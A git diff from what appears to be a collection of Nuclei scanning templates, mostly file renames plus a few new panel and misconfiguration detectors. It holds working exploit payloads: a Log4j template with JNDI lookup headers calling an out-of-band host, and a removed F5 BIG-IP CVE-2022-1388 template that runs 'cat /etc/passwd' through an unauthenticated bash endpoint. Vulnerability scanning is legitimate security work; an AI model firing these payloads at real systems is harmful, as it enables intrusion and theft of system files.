http.title:"Manager" product:"Wowza Streaming Engine" - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/enginemanager/ftu/welcome.htm' - matchers-condition: and - matchers: - - type: word - words: - - 'Wowza Streaming Engine Manager' - - type: status - status: - - 200 diff --git a/poc/docker/exposed-docker-api-7300.yaml b/poc/docker/exposed-docker-api.yaml similarity index 100% rename from poc/docker/exposed-docker-api-7300.yaml rename to poc/docker/exposed-docker-api.yaml diff --git a/poc/drupal/drupal-user-enum-redirect-7112.yaml b/poc/drupal/drupal-user-enum-redirect.yaml similarity index 100% rename from poc/drupal/drupal-user-enum-redirect-7112.yaml rename to poc/drupal/drupal-user-enum-redirect.yaml diff --git a/poc/elk/elasticsearch.yaml b/poc/elk/elasticsearch-7195.yaml similarity index 100% rename from poc/elk/elasticsearch.yaml rename to poc/elk/elasticsearch-7195.yaml diff --git a/poc/exposed/android-debug-database-exposed-312.yaml b/poc/exposed/android-debug-database-exposed.yaml similarity index 100% rename from poc/exposed/android-debug-database-exposed-312.yaml rename to poc/exposed/android-debug-database-exposed.yaml diff --git a/poc/exposed/avtech-dvr-exposure-614.yaml b/poc/exposed/avtech-dvr-exposure-617.yaml similarity index 100% rename from poc/exposed/avtech-dvr-exposure-614.yaml rename to poc/exposed/avtech-dvr-exposure-617.yaml diff --git a/poc/exposed/exposed-docker-api-7300.yaml b/poc/exposed/exposed-docker-api.yaml similarity index 100% rename from poc/exposed/exposed-docker-api-7300.yaml rename to poc/exposed/exposed-docker-api.yaml diff --git a/poc/exposed/exposed-mysql-initial-7322.yaml b/poc/exposed/exposed-mysql-initial.yaml similarity index 100% rename from poc/exposed/exposed-mysql-initial-7322.yaml rename to poc/exposed/exposed-mysql-initial.yaml diff --git a/poc/exposed/exposed-service-now.yaml b/poc/exposed/exposed-service-now-7340.yaml similarity index 100% rename from poc/exposed/exposed-service-now.yaml rename to poc/exposed/exposed-service-now-7340.yaml diff --git a/poc/exposed/exposed-sharepoint-list.yaml b/poc/exposed/exposed-sharepoint-list-7345.yaml similarity index 100% rename from poc/exposed/exposed-sharepoint-list.yaml rename to poc/exposed/exposed-sharepoint-list-7345.yaml diff --git a/poc/exposed/exposed-vscode-7357.yaml b/poc/exposed/exposed-vscode.yaml similarity index 100% rename from poc/exposed/exposed-vscode-7357.yaml rename to poc/exposed/exposed-vscode.yaml diff --git a/poc/exposed/flink-exposure-7511.yaml b/poc/exposed/flink-exposure.yaml similarity index 100% rename from poc/exposed/flink-exposure-7511.yaml rename to poc/exposed/flink-exposure.yaml diff --git a/poc/exposed/iis-internal-ip-disclosure.yaml b/poc/exposed/iis-internal-ip-disclosure-8150.yaml similarity index 100% rename from poc/exposed/iis-internal-ip-disclosure.yaml rename to poc/exposed/iis-internal-ip-disclosure-8150.yaml diff --git a/poc/exposed/pmb-local-file-disclosure.yaml b/poc/exposed/pmb-local-file-disclosure-9620.yaml similarity index 100% rename from poc/exposed/pmb-local-file-disclosure.yaml rename to poc/exposed/pmb-local-file-disclosure-9620.yaml diff --git a/poc/exposed/titannit-web-exposure.yaml b/poc/exposed/titannit-web-exposure.yaml new file mode 100644 index 0000000000..8820107c4c --- /dev/null +++ b/poc/exposed/titannit-web-exposure.yaml @@ -0,0 +1,30 @@ +id: titannit-web-exposure + +info: + name: TitanNit Web Control - Exposure + author: DhiyaneshDk + severity: medium + metadata: + verified: true + max-request: 1 + shodan-query: title:"TitanNit Web Control" + tags: misconfig,titannit,webcontrol,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TitanNit Web Control" + - "System</a>" + condition: and + + - type: status + status: + - 200 +# digest: 4a0a004730450221008000902f0dd80d44d24d0aaa51dc88fb8ca6ea57bdbade552e272b651c9a0e2e02207dbc82cdb7f044cb3ec30f67daee04ba1b293f307cdf6a51b723b7d1720fed34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/ftp/crush-ftp-detect.yaml b/poc/ftp/crush-ftp-detect-1272.yaml similarity index 100% rename from poc/ftp/crush-ftp-detect.yaml rename to poc/ftp/crush-ftp-detect-1272.yaml diff --git a/poc/ftp/web-ftp-detect.yaml b/poc/ftp/web-ftp-detect-11137.yaml similarity index 100% rename from poc/ftp/web-ftp-detect.yaml rename to poc/ftp/web-ftp-detect-11137.yaml diff --git a/poc/fuzz/fuzz-query.yaml b/poc/fuzz/fuzz-mode.yaml similarity index 100% rename from poc/fuzz/fuzz-query.yaml rename to poc/fuzz/fuzz-mode.yaml diff --git a/poc/gcloud/gcp-service-account-7575.yaml b/poc/gcloud/gcp-service-account.yaml similarity index 100% rename from poc/gcloud/gcp-service-account-7575.yaml rename to poc/gcloud/gcp-service-account.yaml diff --git a/poc/git/api-gitlab-430.yaml b/poc/git/api-gitlab.yml similarity index 100% rename from poc/git/api-gitlab-430.yaml rename to poc/git/api-gitlab.yml diff --git a/poc/git/git-web-interface-7713.yaml b/poc/git/git-web-interface.yaml similarity index 100% rename from poc/git/git-web-interface-7713.yaml rename to poc/git/git-web-interface.yaml diff --git a/poc/git/github-gemfile-files-7653.yaml b/poc/git/github-gemfile-files-7652.yaml similarity index 100% rename from poc/git/github-gemfile-files-7653.yaml rename to poc/git/github-gemfile-files-7652.yaml diff --git a/poc/http/http-xframe-header.yaml b/poc/header/http-hsts-header.yaml similarity index 66% rename from poc/http/http-xframe-header.yaml rename to poc/header/http-hsts-header.yaml index adc32be905..8777c1536a 100644 --- a/poc/http/http-xframe-header.yaml +++ b/poc/header/http-hsts-header.yaml @@ -1,10 +1,10 @@ id: http-sts info: - name: HTTP STS extraction + name: HTTP X-Frame-Options extraction author: Arqsz severity: info - description: "Extract HSTS header if possible" + description: "Extract X-Frame-Options header if possible" tags: misconfig,headers,remote,basic requests: @@ -19,4 +19,4 @@ requests: - type: regex part: all_headers regex: - - "(?i)Strict-Transport-Security: .*" \ No newline at end of file + - "(?i)X-Frame-Options: .*" \ No newline at end of file diff --git a/poc/header/log4j-all-headers.yaml b/poc/header/log4j-header.yaml similarity index 79% rename from poc/header/log4j-all-headers.yaml rename to poc/header/log4j-header.yaml index 1d617fc7fd..7e1270f434 100644 --- a/poc/header/log4j-all-headers.yaml +++ b/poc/header/log4j-header.yaml @@ -1,90 +1,23 @@ id: log4j-fuzz-head-poc info: - name: "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints" - description: | - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features - used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other - JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary - code loaded from LDAP servers when message lookup substitution is enabled. - From log4j 2.15.0, this behavior has been disabled by default. - From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. - Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, - or other Apache Logging Services projects. - author: xxx,topscoder + name: log4j-rce漏洞 + author: xxx severity: critical - reference: - - https://logging.apache.org/log4j/2.x/security.html - - http://www.openwall.com/lists/oss-security/2021/12/10/1 - - http://www.openwall.com/lists/oss-security/2021/12/10/2 - - http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html - - https://security.netapp.com/advisory/ntap-20211210-0007/ - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd - - http://www.openwall.com/lists/oss-security/2021/12/10/3 - - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032 - - https://www.oracle.com/security-alerts/alert-cve-2021-44228.html - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/ - - http://www.openwall.com/lists/oss-security/2021/12/13/1 - - http://www.openwall.com/lists/oss-security/2021/12/13/2 - - https://twitter.com/kurtseifried/status/1469345530182455296 - - https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html - - https://www.debian.org/security/2021/dsa-5020 - - https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf - - http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html - - http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html - - http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html - - http://www.openwall.com/lists/oss-security/2021/12/14/4 - - https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html - - https://www.kb.cert.org/vuls/id/930724 - - http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html - - http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html - - http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html - - http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html - - http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html - - http://www.openwall.com/lists/oss-security/2021/12/15/3 - - https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf - - https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/ - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd - - https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf - - http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html - - https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf - - http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/ - - https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md - - http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html - - http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html - - https://www.oracle.com/security-alerts/cpujan2022.html - - https://github.com/cisagov/log4j-affected-db - - https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001 - - https://support.apple.com/kb/HT213189 - - http://seclists.org/fulldisclosure/2022/Mar/23 - - https://www.oracle.com/security-alerts/cpuapr2022.html - - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228 - - https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html - - http://seclists.org/fulldisclosure/2022/Jul/11 - - http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html - - http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html - - http://seclists.org/fulldisclosure/2022/Dec/2 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2021-44228 - tags: apache,rce,log4j,critical,cve + tags: apache,rce -http: +requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} - - | POST / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} payloads: log4j_payloads: - - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}' @@ -267,7 +200,7 @@ http: - 'Contact: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Wap-Profile: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Api-Version: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - + attack: clusterbomb matchers-condition: or matchers: @@ -282,5 +215,3 @@ http: name: dns words: - "dns" - -# Enhanced by topscoder 31.march.2023 \ No newline at end of file diff --git a/poc/http/CL-TE-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml similarity index 100% rename from poc/http/CL-TE-http-smuggling.yaml rename to poc/http/cl-te-http-smuggling.yaml diff --git a/poc/http/default-lighttpd-page.yaml b/poc/http/default-lighttpd-page-6866.yaml similarity index 100% rename from poc/http/default-lighttpd-page.yaml rename to poc/http/default-lighttpd-page-6866.yaml diff --git a/poc/header/http-xframe-header.yaml b/poc/http/http-hsts-header.yaml similarity index 66% rename from poc/header/http-xframe-header.yaml rename to poc/http/http-hsts-header.yaml index adc32be905..8777c1536a 100644 --- a/poc/header/http-xframe-header.yaml +++ b/poc/http/http-hsts-header.yaml @@ -1,10 +1,10 @@ id: http-sts info: - name: HTTP STS extraction + name: HTTP X-Frame-Options extraction author: Arqsz severity: info - description: "Extract HSTS header if possible" + description: "Extract X-Frame-Options header if possible" tags: misconfig,headers,remote,basic requests: @@ -19,4 +19,4 @@ requests: - type: regex part: all_headers regex: - - "(?i)Strict-Transport-Security: .*" \ No newline at end of file + - "(?i)X-Frame-Options: .*" \ No newline at end of file diff --git a/poc/http/http-raw.yaml b/poc/http/http-raw-multiple.yaml similarity index 58% rename from poc/http/http-raw.yaml rename to poc/http/http-raw-multiple.yaml index e30cccd5d9..8c2c5be449 100644 --- a/poc/http/http-raw.yaml +++ b/poc/http/http-raw-multiple.yaml @@ -17,16 +17,6 @@ requests: Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 - - | - GET /testing HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - matchers: - type: word words: diff --git a/poc/http/https-to-http-redirect.yaml b/poc/http/https-to-http-redirect.yaml new file mode 100644 index 0000000000..b32e2d48b7 --- /dev/null +++ b/poc/http/https-to-http-redirect.yaml @@ -0,0 +1,26 @@ +id: https-to-http-redirect + +info: + name: HTTPS to HTTP redirect Misconfiguration + author: kazet + severity: info + description: | + Detects whether there is a redirect from https:// to http:// + metadata: + max-request: 1 + verified: true + tags: misconfig,http,https + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'startswith(tolower(location), "http://")' + - 'startswith(tostring(BaseURL), "https://")' + - '(status_code == 301 || status_code == 302 || status_code == 307)' + condition: and +# digest: 4a0a0047304502206212deffff885bc2abd110b7921124764815e61844a28cf278f271f6d9753151022100861fee57cff6e033d3b77a48aa8a88595f5d7ea267d502b1aadf739e417f6608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/ibm/ibm-mqseries-web-console.yaml b/poc/ibm/ibm-mqseries-web-console-8109.yaml similarity index 100% rename from poc/ibm/ibm-mqseries-web-console.yaml rename to poc/ibm/ibm-mqseries-web-console-8109.yaml diff --git a/poc/ibm/ibm-sterling-detect.yaml b/poc/ibm/ibm-sterling-detect-8122.yaml similarity index 100% rename from poc/ibm/ibm-sterling-detect.yaml rename to poc/ibm/ibm-sterling-detect-8122.yaml diff --git a/poc/java/jetty-showcontexts-enable-8295.yaml b/poc/java/jetty-showcontexts-enable.yaml similarity index 100% rename from poc/java/jetty-showcontexts-enable-8295.yaml rename to poc/java/jetty-showcontexts-enable.yaml diff --git a/poc/java/springboot-detect.yaml b/poc/java/spring-boot-actuators.yaml similarity index 100% rename from poc/java/springboot-detect.yaml rename to poc/java/spring-boot-actuators.yaml diff --git a/poc/java/springboot-env-10450.yaml b/poc/java/springboot-env.yaml similarity index 100% rename from poc/java/springboot-env-10450.yaml rename to poc/java/springboot-env.yaml diff --git a/poc/javascript/aem-querybuilder-json-servlet.yaml b/poc/javascript/aem-querybuilder-json-servlet-186.yaml similarity index 100% rename from poc/javascript/aem-querybuilder-json-servlet.yaml rename to poc/javascript/aem-querybuilder-json-servlet-186.yaml diff --git a/poc/javascript/bower-json-769.yaml b/poc/javascript/bower-json.yaml similarity index 100% rename from poc/javascript/bower-json-769.yaml rename to poc/javascript/bower-json.yaml diff --git a/poc/javascript/log4jshell.yaml b/poc/javascript/log4jshell-detect.yaml similarity index 100% rename from poc/javascript/log4jshell.yaml rename to poc/javascript/log4jshell-detect.yaml diff --git a/poc/local_file_inclusion/thinkcmf-lfi.yaml b/poc/local_file_inclusion/thinkcmf-lfi (copy 1).yaml similarity index 100% rename from poc/local_file_inclusion/thinkcmf-lfi.yaml rename to poc/local_file_inclusion/thinkcmf-lfi (copy 1).yaml diff --git a/poc/local_file_inclusion/wordpress-lfi(1).yaml b/poc/local_file_inclusion/wordpress-LFI.yaml similarity index 100% rename from poc/local_file_inclusion/wordpress-lfi(1).yaml rename to poc/local_file_inclusion/wordpress-LFI.yaml diff --git a/poc/local_file_inclusion/wordpress-wordfence-lfi.yaml b/poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml similarity index 100% rename from poc/local_file_inclusion/wordpress-wordfence-lfi.yaml rename to poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml diff --git a/poc/local_file_inclusion/wp-simple-fields-lfi.yaml b/poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml similarity index 100% rename from poc/local_file_inclusion/wp-simple-fields-lfi.yaml rename to poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml diff --git a/poc/local_file_inclusion/wp-spot-premium-lfi.yaml b/poc/local_file_inclusion/wp-spot-premium-lfi-11583.yaml similarity index 100% rename from poc/local_file_inclusion/wp-spot-premium-lfi.yaml rename to poc/local_file_inclusion/wp-spot-premium-lfi-11583.yaml diff --git a/poc/microsoft/empirecms-rate-sqli.yaml b/poc/microsoft/EmpireCMS-rate-sqli.yaml similarity index 100% rename from poc/microsoft/empirecms-rate-sqli.yaml rename to poc/microsoft/EmpireCMS-rate-sqli.yaml diff --git a/poc/microsoft/aims-password-mgmt-client-219.yaml b/poc/microsoft/aims-password-mgmt-client.yaml similarity index 100% rename from poc/microsoft/aims-password-mgmt-client-219.yaml rename to poc/microsoft/aims-password-mgmt-client.yaml diff --git a/poc/microsoft/aims-password-portal-225.yaml b/poc/microsoft/aims-password-portal.yaml similarity index 100% rename from poc/microsoft/aims-password-portal-225.yaml rename to poc/microsoft/aims-password-portal.yaml diff --git a/poc/microsoft/call-break-cms-840.yaml b/poc/microsoft/call-break-cms-838.yaml similarity index 100% rename from poc/microsoft/call-break-cms-840.yaml rename to poc/microsoft/call-break-cms-838.yaml diff --git a/poc/microsoft/cisco-systems-login-973.yaml b/poc/microsoft/cisco-systems-login.yaml similarity index 100% rename from poc/microsoft/cisco-systems-login-973.yaml rename to poc/microsoft/cisco-systems-login.yaml diff --git a/poc/microsoft/craft-cms-detect-1247.yaml b/poc/microsoft/craft-cms-detect.yaml similarity index 100% rename from poc/microsoft/craft-cms-detect-1247.yaml rename to poc/microsoft/craft-cms-detect.yaml diff --git a/poc/microsoft/craftcms-admin-panel.yaml b/poc/microsoft/craftcms-admin-panel-1245.yaml similarity index 100% rename from poc/microsoft/craftcms-admin-panel.yaml rename to poc/microsoft/craftcms-admin-panel-1245.yaml diff --git a/poc/microsoft/dotcms-admin-panel.yaml b/poc/microsoft/dotcms-admin-panel-7087.yaml similarity index 100% rename from poc/microsoft/dotcms-admin-panel.yaml rename to poc/microsoft/dotcms-admin-panel-7087.yaml diff --git a/poc/microsoft/kevinlab-bems-sqli.yaml b/poc/microsoft/kevinlab-bems-sqli-8460.yaml similarity index 100% rename from poc/microsoft/kevinlab-bems-sqli.yaml rename to poc/microsoft/kevinlab-bems-sqli-8460.yaml diff --git a/poc/microsoft/kevinlab-hems-backdoor-8467.yaml b/poc/microsoft/kevinlab-hems-backdoor.yaml similarity index 100% rename from poc/microsoft/kevinlab-hems-backdoor-8467.yaml rename to poc/microsoft/kevinlab-hems-backdoor.yaml diff --git a/poc/microsoft/lotuscms-rce.yaml b/poc/microsoft/lotuscms-rce-8653.yaml similarity index 100% rename from poc/microsoft/lotuscms-rce.yaml rename to poc/microsoft/lotuscms-rce-8653.yaml diff --git a/poc/microsoft/seeddms-detect-10131.yaml b/poc/microsoft/seeddms-detect.yaml similarity index 100% rename from poc/microsoft/seeddms-detect-10131.yaml rename to poc/microsoft/seeddms-detect.yaml diff --git a/poc/mongodb/alibaba-mongoshake-unauth.yaml b/poc/mongodb/alibaba-mongoshake-unauth-270.yaml similarity index 100% rename from poc/mongodb/alibaba-mongoshake-unauth.yaml rename to poc/mongodb/alibaba-mongoshake-unauth-270.yaml diff --git a/poc/mongodb/rockmongo-default-login.yaml b/poc/mongodb/rockmongo-default-login-9900.yaml similarity index 100% rename from poc/mongodb/rockmongo-default-login.yaml rename to poc/mongodb/rockmongo-default-login-9900.yaml diff --git a/poc/mysql/exposed-mysql-initial-7322.yaml b/poc/mysql/exposed-mysql-initial.yaml similarity index 100% rename from poc/mysql/exposed-mysql-initial-7322.yaml rename to poc/mysql/exposed-mysql-initial.yaml diff --git a/poc/open_redirect/attitude-theme-open-redirect.yaml b/poc/open_redirect/attitude-theme-open-redirect-586.yaml similarity index 100% rename from poc/open_redirect/attitude-theme-open-redirect.yaml rename to poc/open_redirect/attitude-theme-open-redirect-586.yaml diff --git a/poc/open_redirect/aws-redirect-652.yaml b/poc/open_redirect/aws-redirect.yaml similarity index 100% rename from poc/open_redirect/aws-redirect-652.yaml rename to poc/open_redirect/aws-redirect.yaml diff --git a/poc/open_redirect/drupal-user-enum-redirect-7112.yaml b/poc/open_redirect/drupal-user-enum-redirect.yaml similarity index 100% rename from poc/open_redirect/drupal-user-enum-redirect-7112.yaml rename to poc/open_redirect/drupal-user-enum-redirect.yaml diff --git a/poc/open_redirect/https-to-http-redirect.yaml b/poc/open_redirect/https-to-http-redirect.yaml new file mode 100644 index 0000000000..b32e2d48b7 --- /dev/null +++ b/poc/open_redirect/https-to-http-redirect.yaml @@ -0,0 +1,26 @@ +id: https-to-http-redirect + +info: + name: HTTPS to HTTP redirect Misconfiguration + author: kazet + severity: info + description: | + Detects whether there is a redirect from https:// to http:// + metadata: + max-request: 1 + verified: true + tags: misconfig,http,https + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'startswith(tolower(location), "http://")' + - 'startswith(tostring(BaseURL), "https://")' + - '(status_code == 301 || status_code == 302 || status_code == 307)' + condition: and +# digest: 4a0a0047304502206212deffff885bc2abd110b7921124764815e61844a28cf278f271f6d9753151022100861fee57cff6e033d3b77a48aa8a88595f5d7ea267d502b1aadf739e417f6608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/oracle/oracle-oam-xss(1).yaml b/poc/oracle/oracle-oam-xss.yaml similarity index 100% rename from poc/oracle/oracle-oam-xss(1).yaml rename to poc/oracle/oracle-oam-xss.yaml diff --git a/poc/other/netsurveillance-fileread.yaml b/poc/other/NETSurveillance-fileRead.yaml similarity index 100% rename from poc/other/netsurveillance-fileread.yaml rename to poc/other/NETSurveillance-fileRead.yaml diff --git a/poc/other/tenda-leakage.yaml b/poc/other/Tenda-leakage.yaml similarity index 100% rename from poc/other/tenda-leakage.yaml rename to poc/other/Tenda-leakage.yaml diff --git a/poc/other/advance-setup.yaml b/poc/other/advance-setup-120.yaml similarity index 100% rename from poc/other/advance-setup.yaml rename to poc/other/advance-setup-120.yaml diff --git a/poc/other/alienvault-usm.yaml b/poc/other/alienvault-usm-272.yaml similarity index 100% rename from poc/other/alienvault-usm.yaml rename to poc/other/alienvault-usm-272.yaml diff --git a/poc/other/ampps-panel.yaml b/poc/other/ampps-panel-311.yaml similarity index 100% rename from poc/other/ampps-panel.yaml rename to poc/other/ampps-panel-311.yaml diff --git a/poc/other/Anni-fileDownload.yaml b/poc/other/anni-filedownload.yaml similarity index 100% rename from poc/other/Anni-fileDownload.yaml rename to poc/other/anni-filedownload.yaml diff --git a/poc/other/AolynkBR304-weakPass.yaml b/poc/other/aolynkbr304-weakpass.yaml similarity index 100% rename from poc/other/AolynkBR304-weakPass.yaml rename to poc/other/aolynkbr304-weakpass.yaml diff --git a/poc/other/automation-direct-596.yaml b/poc/other/automation-direct.yaml similarity index 100% rename from poc/other/automation-direct-596.yaml rename to poc/other/automation-direct.yaml diff --git a/poc/other/bitrix_bak_check.yaml b/poc/other/bak.yaml similarity index 87% rename from poc/other/bitrix_bak_check.yaml rename to poc/other/bak.yaml index 4e63ad8e62..d70ecfaf93 100644 --- a/poc/other/bitrix_bak_check.yaml +++ b/poc/other/bak.yaml @@ -2,13 +2,13 @@ id: "bitrix_bak_check" info: name: Bitrix check .env file existence - author: оосо + author: crth0 severity: high description: Check if the .env file exists on the website. reference: - https://github.com/cr1f/writeups/blob/main/attacking_bitrix.pdf classification: - tags: cve,cve2023,bitrix,env,security + tags: cve,bak,bitrix,env,security http: - method: GET diff --git a/poc/other/barracuda-panel-685.yaml b/poc/other/barracuda-panel.yaml similarity index 100% rename from poc/other/barracuda-panel-685.yaml rename to poc/other/barracuda-panel.yaml diff --git a/poc/other/basic-dns-example.yaml b/poc/other/basic-dns-example.yaml index 040b42c7de..b0dbdf3b02 100644 --- a/poc/other/basic-dns-example.yaml +++ b/poc/other/basic-dns-example.yaml @@ -1,18 +1,17 @@ id: basic-dns-example info: - name: Basic DNS Request + name: Test DNS Template author: pdteam severity: info dns: - name: "{{FQDN}}" - type: CNAME + type: A class: inet recursion: true retries: 3 matchers: - type: word words: - # The response must contains a CNAME record - - "IN\tCNAME" + - "1.1.1.1" \ No newline at end of file diff --git a/poc/other/bigip.yaml b/poc/other/bigip.yaml deleted file mode 100644 index 2dd642ecc1..0000000000 --- a/poc/other/bigip.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2022-1388 -info: - name: F5 Big-IP iControl REST RCE - author: dk4trin - severity: critical - tags: cve,cve2022,bigip,rce -requests: - - raw: - - | - POST /mgmt/tm/util/bash HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46 - Connection: keep-alive, X-F5-Auth-Token - X-F5-Auth-Token: 0 - - {"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " } - matchers-condition: and - matchers: - - type: word - words: - - 'root:x' - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/other/bookstack-panel.yaml b/poc/other/bookstack-panel-766.yaml similarity index 100% rename from poc/other/bookstack-panel.yaml rename to poc/other/bookstack-panel-766.yaml diff --git a/poc/other/cache-poisoning.yaml b/poc/other/cache-poisoning-824.yaml similarity index 100% rename from poc/other/cache-poisoning.yaml rename to poc/other/cache-poisoning-824.yaml diff --git a/poc/other/cacti-panel.yaml b/poc/other/cacti-panel-828.yaml similarity index 100% rename from poc/other/cacti-panel.yaml rename to poc/other/cacti-panel-828.yaml diff --git a/poc/other/cacti-weathermap-file-write.yaml b/poc/other/cacti-weathermap-file-write-833.yaml similarity index 100% rename from poc/other/cacti-weathermap-file-write.yaml rename to poc/other/cacti-weathermap-file-write-833.yaml diff --git a/poc/other/campaignmonitor-844.yaml b/poc/other/campaignmonitor.yaml similarity index 100% rename from poc/other/campaignmonitor-844.yaml rename to poc/other/campaignmonitor.yaml diff --git a/poc/other/can-i-take-over-dns.yaml b/poc/other/can-i-take-over-dns-853.yaml similarity index 100% rename from poc/other/can-i-take-over-dns.yaml rename to poc/other/can-i-take-over-dns-853.yaml diff --git a/poc/other/cassia-bluetooth-gateway-panel.yaml b/poc/other/cassia-bluetooth-gateway-panel.yaml new file mode 100644 index 0000000000..2ff8cdd3ef --- /dev/null +++ b/poc/other/cassia-bluetooth-gateway-panel.yaml @@ -0,0 +1,32 @@ +id: cassia-bluetooth-gateway-panel + +info: + name: Cassia Bluetooth Gateway Panel - Detect + author: DhiyaneshDk + severity: info + description: | + Cassia Bluetooth Gateway Management Platform login page was discovered. + reference: + - https://www.cassianetworks.com/products/x1000-outdoor-bluetooth-router/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Cassia Bluetooth Gateway Management Platform" + tags: cassia,gateway,login,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cassia/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cassia Bluetooth Gateway Management Platform" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100baabf488454e8584e30f25c730d6c8205a81001f9ce8402e9a0030146d3c7717022100dfdcbb0e792557b52b82af06286c1d278b9992528c519460c660113c0a6fa643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/checkpoint-panel-898.yaml b/poc/other/checkpoint-panel-899.yaml similarity index 100% rename from poc/other/checkpoint-panel-898.yaml rename to poc/other/checkpoint-panel-899.yaml diff --git a/poc/other/clientaccesspolicy-1005.yaml b/poc/other/clientaccesspolicy.yaml similarity index 100% rename from poc/other/clientaccesspolicy-1005.yaml rename to poc/other/clientaccesspolicy.yaml diff --git a/poc/other/cloudphysician-radar-1028.yaml b/poc/other/cloudphysician-radar.yaml similarity index 100% rename from poc/other/cloudphysician-radar-1028.yaml rename to poc/other/cloudphysician-radar.yaml diff --git a/poc/other/cname-fingerprint-1030.yaml b/poc/other/cname-fingerprint.yaml similarity index 100% rename from poc/other/cname-fingerprint-1030.yaml rename to poc/other/cname-fingerprint.yaml diff --git a/poc/other/crossdomain-xml-1269.yaml b/poc/other/crossdomain-xml-1267.yaml similarity index 100% rename from poc/other/crossdomain-xml-1269.yaml rename to poc/other/crossdomain-xml-1267.yaml diff --git a/poc/other/csod-panel-1289.yaml b/poc/other/csod-panel.yaml similarity index 100% rename from poc/other/csod-panel-1289.yaml rename to poc/other/csod-panel.yaml diff --git a/poc/other/defectdojo-panel-6916.yaml 